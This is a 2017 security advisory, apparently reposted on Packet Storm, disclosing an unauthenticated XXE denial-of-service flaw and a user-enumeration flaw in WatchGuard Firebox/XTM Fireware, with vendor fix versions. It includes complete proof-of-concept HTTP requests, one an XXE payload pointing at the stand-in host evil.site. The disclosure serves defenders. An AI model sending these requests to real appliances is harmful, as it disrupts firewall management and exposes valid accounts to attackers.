what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Watchguard Firebox / XTM XXE Injection

Watchguard Firebox / XTM XXE Injection
Posted Apr 17, 2017
Authored by David Fernandez

Watchguard's Firebox and XTM appliances suffer from XML external entity injection and XML-RPC user enumeration vulnerabilities.

tags | exploit, vulnerability, xxe
SHA-256 | 947dba226b2f6a9ad24e1b5e7af199cf29a3450764e88c890268dcb7b1cd44c2

Watchguard Firebox / XTM XXE Injection

Change Mirror Download
Watchguardas Firebox and XTM are a series of enterprise grade network
security appliances providing advanced security services like next
generation firewall, intrusion prevention, malware detection and
blockage and others. Two vulnerabilities were discovered affecting the
XML-RPC interface of the Web UI used to manage Fireware, the operating
system running on Watchguard Firebox and XTM appliances. To exploit
any of the flaws discovered, no authentication on the Web UI is
needed.
---------------------------------------------------------------------------
---------------------------------------------------------------------------
XML-RPC External Entity Expansion DoS

Credit
David Fernandez of Sidertia Solutions

Versions Affected
Fireware v11.9 version was found to be vulnerable and vendor confirmed
v11.12 Update 1 (latest when we reported to vendor) was vulnerable as
well.

CVE Reference
As far as we know, no CVE has been requested for this vulnerability.
Vendor assigned internal id 92867 to vulnerability and will release a
knowledge Base article following this advisory.

Vendor Fix
Vendor fixed the vulnerability in their v11.12.2 release.

Vulnerability Type
Denial of service.

Description
While attempting to abuse the XML parser of the interface by mean of
External Entity Expansion (XXE) attacks, we discovered that after
repetitive attempts the XML-RPC agent crashes causing a severe
disruption in the functionality and performance of the device.

Impact
On Fireware version v11.9, after a discrete number of injection
attempts, the XML-RPC agent (wgagent) crashes and is not able to
recover, causing a lockout in the Web UI which will be unavailable for
ten minutes, thus making impossible to manage the firewall. Besides
that, it causes either service interrupt or a serious degradation in
performance in connections traversing the firewall (for example, RDP
clients were unable to connect or did it in slow connection mode). On
Fireware version v11.12 Update 1, the agent recovers correctly after
each crash, although by continuously executing the XXE attacks the
negative effects on the device are the same than the ones observed in
v11.9.

Proof of concept
Below is an example of one of the requests that, after several
attempts, causes a crash in the XML-RPC agent:

POST /agent/login HTTP/1.1
Host: fireware-host:4100
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: es,en;q=0.8,ca;q=0.6
Cookie: sessionid=dasdasdas
Content-Length: 268
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE methodCall [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/
resource=https://evil.site/index.php?content=testXXE"> ]>
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>&xxe;</string></value></member><member><name>user</name><value><string>admin</string></value></member></struct></value></param></params></methodCall>

Links
https://www.sidertia.com/Home/Community/Blog/2017/04/17/Fixed-the-Fireware-Vulnerabilities-discovered-by-Sidertia
---------------------------------------------------------------------------
---------------------------------------------------------------------------
XML-RPC User Enumeration

Credit
David Fernandez of Sidertia Solutions

Versions Affected
Fireware v11.9 version was found to be vulnerable and vendor confirmed
v11.12 Update 1 (latest when we reported to vendor) was vulnerable as
well.

CVE Reference
As far as we know, no CVE has been requested for this vulnerability.
Vendor assigned internal id 92884 to vulnerability and will release a
knowledge base article following this advisory.

Vendor Fix
Vendor fixed the vulnerability in their v11.12.1 release.

Vulnerability Type
Information disclosure

Description
When a login attempt is made directly over the login endpoint of the
XML-RPC interface using a blank password, we discovered the response
from the device was different for valid users in Web UI than for
non-existing ones.

Impact
The flaw allows to enumerate existing users in the management
interface of the device. The Web UI allows to use as user repository
an internal database (Firebox-DB), Active Directory or a Radius
server, although this flaw was only tested authenticating against
Firebox-DB.

Proof of concept
Below is a request for an existing user login attempt with blank
password in Firebox-DB:

POST /login HTTP/1.1
Host: fireware-host:4100
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: es,en;q=0.8,ca;q=0.6
Cookie: sessionid=dasdasdas
Content-Length: 268
Content-Type: application/xml

<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string></string></value></member><member><name>user</name><value><string>admin</string></value></member></struct></value></param></params></methodCall>

Which will answer with a 200 OK with no body content for an existing
user and with a 200 OK with an XML message (Invalid Credentials) in
case it does not.

Links
https://www.sidertia.com/Home/Community/Blog/2017/04/17/Fixed-the-Fireware-Vulnerabilities-discovered-by-Sidertia
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    0 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close